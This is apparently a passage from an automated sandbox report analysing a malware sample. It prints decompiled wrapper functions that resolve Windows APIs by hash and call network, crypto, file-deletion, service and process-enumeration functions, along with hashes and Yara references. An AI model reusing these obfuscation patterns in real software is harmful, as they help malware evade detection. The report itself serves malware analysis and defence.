				E001F07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                                      0x001f9821
                                                      0x001f9822
                                                      0x001f9825
                                                      0x001f9828
                                                      0x001f982a
                                                      0x001f982c
                                                      0x001f982f
                                                      0x001f9832
                                                      0x001f9835
                                                      0x001f9836
                                                      0x001f9837
                                                      0x001f983c
                                                      0x001f9855
                                                      0x001f9858
                                                      0x001f985f
                                                      0x001f9866
                                                      0x001f986d
                                                      0x001f9874
                                                      0x001f987b
                                                      0x001f988e
                                                      0x001f989b
                                                      0x001f98a2

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001E87F2,0000CAAE,0000510C,AD82F196), ref: 001F989B
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 1bf3bad15c3aece8f2b403b3292d11e26047bfd38b1ea934f0c7b56989d86508
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 0B019A72801208FBDB04EFD5D846CDFBF79EF95750F108188F908A6220E6715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001F7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E001F7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001F07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                                      0x001f7bf7
                                                      0x001f7bf8
                                                      0x001f7bfa
                                                      0x001f7bfd
                                                      0x001f7bff
                                                      0x001f7c02
                                                      0x001f7c06
                                                      0x001f7c07
                                                      0x001f7c0f
                                                      0x001f7c1d
                                                      0x001f7c25
                                                      0x001f7c2d
                                                      0x001f7c31
                                                      0x001f7c38
                                                      0x001f7c3f
                                                      0x001f7c46
                                                      0x001f7c4a
                                                      0x001f7c5e
                                                      0x001f7c67
                                                      0x001f7c6d

                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001F7C67
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: ce09fedc50eca9e1d2d8f728837780fab95cf825b4c8fb3014b54b06bea60826
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: E5014FB190120CFFEB09DF94C84A8DE7BB9EF54314F108198F505A7250E7B15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 52%
                                                      			E001EF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001F07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                                      0x001ef662
                                                      0x001ef663
                                                      0x001ef665
                                                      0x001ef668
                                                      0x001ef66a
                                                      0x001ef66d
                                                      0x001ef670
                                                      0x001ef673
                                                      0x001ef677
                                                      0x001ef678
                                                      0x001ef67d
                                                      0x001ef687
                                                      0x001ef693
                                                      0x001ef69a
                                                      0x001ef6a1
                                                      0x001ef6a5
                                                      0x001ef6a9
                                                      0x001ef6b0
                                                      0x001ef6c9
                                                      0x001ef6d8
                                                      0x001ef6de

                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001EF6D8
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: 8d5c33ce5b49c7f96cbb9769759cca5bbcc1b768e543c718b67643f59ff8d05f
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: C001E5B690120CBBEF05AF94DC068DF7F79EB15364F148188F90462251D7B25E61DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001EB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001E602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001F07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                                      0x001eb6f3
                                                      0x001eb6f8
                                                      0x001eb702
                                                      0x001eb70b
                                                      0x001eb712
                                                      0x001eb719
                                                      0x001eb720
                                                      0x001eb727
                                                      0x001eb72e
                                                      0x001eb747
                                                      0x001eb759
                                                      0x001eb75e

                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001EB759
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: f9da5785dbd9570073441e0a55d7972b48b4dfa7cb78d73ba810e2c20631ceef
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: 4A0128B694130CFBEB45DF94DD06A9E7BB5EB18704F108188FA09661A1D3B25A20AB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001FAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001FAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001F07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                                      0x001faa3f
                                                      0x001faa40
                                                      0x001faa41
                                                      0x001faa44
                                                      0x001faa47
                                                      0x001faa4b
                                                      0x001faa4c
                                                      0x001faa51
                                                      0x001faa5b
                                                      0x001faa64
                                                      0x001faa68
                                                      0x001faa6f
                                                      0x001faa76
                                                      0x001faa8d
                                                      0x001faa90
                                                      0x001faa9d
                                                      0x001faaa8
                                                      0x001faaad

                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001FAAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: ae75e7940aa0f3f516375c71d7746bc297ccf3d88e33e1714b6200cce300473c
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 0CF069B190020CFFDF08EF94DD4A89EBFB8EB44304F108188F905A6261D3B29B549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E001E5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001F07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                                      0x001e5fb5
                                                      0x001e5fb6
                                                      0x001e5fb7
                                                      0x001e5fbb
                                                      0x001e5fbc
                                                      0x001e5fc1
                                                      0x001e5fcb
                                                      0x001e5fd7
                                                      0x001e5fde
                                                      0x001e5fe5
                                                      0x001e5ffc
                                                      0x001e5fff
                                                      0x001e6006
                                                      0x001e600d
                                                      0x001e601a
                                                      0x001e6025
                                                      0x001e602a

                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001E6025
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: f4d9d5f24093db104dc701dd67091ce2778e05ea5050f4393f3df9c3ed5d6a3d
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: 38F04FB0C1120CFFDB08DFA0E94689EBFB8EB50340F208198E909A7261E7715F559F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: rundll32.exe PID: 3052 Parent PID: 2408 rundll32.exeCOMMON

                                                      Executed Functions

                                                      Function 0023023A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenetworkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 52%
                                                      			E0023023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				void* _t25;
				int _t31;
				void* _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t37 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t25);
				_v12 = 0x4c1d;
				_v12 = _v12 ^ 0x5ad90362;
				_v12 = _v12 ^ 0x5ad955af;
				_v8 = 0xc5f7;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x98520be0;
				_v8 = _v8 + 0xd998;
				_v8 = _v8 ^ 0x98094817;
				E002307A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
				return _t31;
			}








                                                      0x0023023d
                                                      0x0023023e
                                                      0x00230240
                                                      0x00230243
                                                      0x00230245
                                                      0x00230248
                                                      0x0023024b
                                                      0x0023024e
                                                      0x00230252
                                                      0x00230253
                                                      0x00230258
                                                      0x00230262
                                                      0x0023026e
                                                      0x00230275
                                                      0x0023028c
                                                      0x0023028f
                                                      0x00230296
                                                      0x0023029d
                                                      0x002302aa
                                                      0x002302bc
                                                      0x002302c2

                                                      APIs
                                                      • InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 002302BC
                                                      Strings
                                                      • e list for clipped items, xrefs: 00230269
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileInternetRead
                                                      • String ID: e list for clipped items
                                                      • API String ID: 778332206-922771492
                                                      • Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                                      • Instruction ID: 8d387dc263cce60f7cc9c4100b27cb2b13a79d7000d8c7178615b53cf0ed6910
                                                      • Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                                      • Instruction Fuzzy Hash: E4012976911208FFEF05EF94D9068DEBFB9EF04314F108188F90466261D3729F61AB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002275AE, Relevance: 1.6, APIs: 1, Instructions: 62encryptionCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E002275AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void* _t63;
				void* _t64;

				_t64 = __edx;
				E0022602B(_t43);
				_v8 = 0x98b5;
				_v8 = _v8 >> 9;
				_t54 = 0x5f;
				_v8 = _v8 / _t54;
				_v8 = _v8 + 0xffff1c63;
				_v8 = _v8 ^ 0xffff635b;
				_v12 = 0x5016;
				_v12 = _v12 + 0xffff6b9b;
				_t55 = 0x41;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x03f03403;
				_t51 = E002307A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
				return _t52;
			}












                                                      0x002275b7
                                                      0x002275d8
                                                      0x002275dd
                                                      0x002275e7
                                                      0x002275f2
                                                      0x002275f7
                                                      0x002275fc
                                                      0x00227603
                                                      0x0022760a
                                                      0x00227611
                                                      0x0022761b
                                                      0x00227623
                                                      0x0022762b
                                                      0x0022763f
                                                      0x0022765c
                                                      0x00227662

                                                      APIs
                                                      • CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 0022765C
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CryptDecodeObject
                                                      • String ID:
                                                      • API String ID: 1207547050-0
                                                      • Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                                      • Instruction ID: e437d75b70e5e4b9246334512e3159ceb92c75827ee3caf358b936d0520d8b4a
                                                      • Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                                      • Instruction Fuzzy Hash: 1621067290060CFFDF06CF94DC46DDE7F76EB08324F148148FA18662A0D7B29A61AB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0022109C, Relevance: 1.5, APIs: 1, Instructions: 46fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E0022109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				void* _t38;
				signed int _t40;
				WCHAR* _t46;

				_push(_a16);
				_t46 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0022602B(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0xf19a8;
				_v20 = 0x58c643;
				_v12 = 0xbcc6;
				_v12 = _v12 | 0xbb59ffff;
				_v12 = _v12 ^ 0xbb59839d;
				_v8 = 0x5dbd;
				_v8 = _v8 << 0xd;
				_t40 = 0x3f;
				_v8 = _v8 / _t40;
				_v8 = _v8 * 0x1f;
				_v8 = _v8 ^ 0x05c44d1b;
				E002307A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
				_t38 = FindFirstFileW(_t46, _a4); // executed
				return _t38;
			}












                                                      0x002210a3
                                                      0x002210a6
                                                      0x002210a8
                                                      0x002210ab
                                                      0x002210ae
                                                      0x002210b1
                                                      0x002210b3
                                                      0x002210b8
                                                      0x002210bf
                                                      0x002210c8
                                                      0x002210cf
                                                      0x002210d6
                                                      0x002210dd
                                                      0x002210e4
                                                      0x002210eb
                                                      0x002210f4
                                                      0x002210fc
                                                      0x0022110f
                                                      0x00221112
                                                      0x0022111f
                                                      0x0022112b
                                                      0x00221131

                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,BB59839D), ref: 0022112B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                                      • Instruction ID: 5e5631b204e9bd9d8a323f68259367820e8be34550aa1f871d1c1f35557cac91
                                                      • Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                                      • Instruction Fuzzy Hash: 47115BB5D01218FBDF04EFA8D9499DEBFB5EF44314F208098E90467251D7B14B249F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00221C88, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E00221C88(int _a12) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t28;
				signed int _t29;

				_v28 = 0x4309a9;
				asm("stosd");
				_t29 = 0x31;
				asm("stosd");
				asm("stosd");
				_v12 = 0x7af7;
				_v12 = _v12 + 0x2003;
				_v12 = _v12 ^ 0x000083a5;
				_v8 = 0xa138;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t29;
				_v8 = _v8 ^ 0x00030e85;
				E002307A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t28;
			}









                                                      0x00221c8f
                                                      0x00221c9d
                                                      0x00221ca0
                                                      0x00221ca3
                                                      0x00221ca6
                                                      0x00221ca7
                                                      0x00221cae
                                                      0x00221cb5
                                                      0x00221cbc
                                                      0x00221cc3
                                                      0x00221cd6
                                                      0x00221cd9
                                                      0x00221ce6
                                                      0x00221cf3
                                                      0x00221cf9

                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 00221CF3
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3332741929-0
                                                      • Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                                      • Instruction ID: 8408af1fea648d5affc68213bd768b0b0444e044796688f47f5a9b5b31ab24b0
                                                      • Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                                      • Instruction Fuzzy Hash: D1F03171E11208BBFB04DFA8CD4669EFBB5EF94704F208099E50067291D7F55F158B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00225A52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54networkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 42%
                                                      			E00225A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				unsigned int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t25;
				void* _t31;
				WCHAR* _t37;

				_t37 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E0022602B(_t25);
				_v28 = 0x354aea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0x4733;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffffa4b2;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00006f5b;
				_v12 = 0x6e5;
				_v12 = _v12 ^ 0x21b9cf62;
				_v12 = _v12 ^ 0x21b9d5f6;
				E002307A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
				return _t31;
			}










                                                      0x00225a5d
                                                      0x00225a5f
                                                      0x00225a60
                                                      0x00225a63
                                                      0x00225a66
                                                      0x00225a69
                                                      0x00225a6c
                                                      0x00225a6f
                                                      0x00225a70
                                                      0x00225a71
                                                      0x00225a72
                                                      0x00225a77
                                                      0x00225a86
                                                      0x00225a91
                                                      0x00225a99
                                                      0x00225a9a
                                                      0x00225aa1
                                                      0x00225aa5
                                                      0x00225aac
                                                      0x00225ab0
                                                      0x00225ab7
                                                      0x00225abe
                                                      0x00225ac5
                                                      0x00225ad2
                                                      0x00225ae1
                                                      0x00225ae9

                                                      APIs
                                                      • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 00225AE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InternetOpen
                                                      • String ID: e list for clipped items$J5
                                                      • API String ID: 2038078732-2011309526
                                                      • Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                                      • Instruction ID: 4de38bbca2c5ad14f561295e45529feb0f0daf69c74b7dee5943e3cb7f3905ae
                                                      • Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                                      • Instruction Fuzzy Hash: 18113CB290060CBFEB05DF98DD859DFBB79EF14358F104098FA0562120D3B68F659BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00237955, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62networkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 43%
                                                      			E00237955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t41;
				short _t47;

				_push(_a52);
				_t47 = __ecx;
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__ecx & 0x0000ffff);
				E0022602B(__ecx & 0x0000ffff);
				_v24 = 0x1f9770;
				_v20 = 0x380697;
				_v16 = 0;
				_v12 = 0x6440;
				_v12 = _v12 * 0xf;
				_v12 = _v12 * 0x65;
				_v12 = _v12 ^ 0x02513e1b;
				_v8 = 0x9d26;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x42bae3e2;
				_v8 = _v8 + 0x19dc;
				_v8 = _v8 ^ 0x40ce99cc;
				E002307A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
				return _t41;
			}










                                                      0x0023795d
                                                      0x00237962
                                                      0x00237964
                                                      0x00237965
                                                      0x0023796b
                                                      0x0023796c
                                                      0x0023796f
                                                      0x00237972
                                                      0x00237975
                                                      0x00237978
                                                      0x00237979
                                                      0x0023797c
                                                      0x0023797f
                                                      0x00237980
                                                      0x00237984
                                                      0x00237985
                                                      0x0023798a
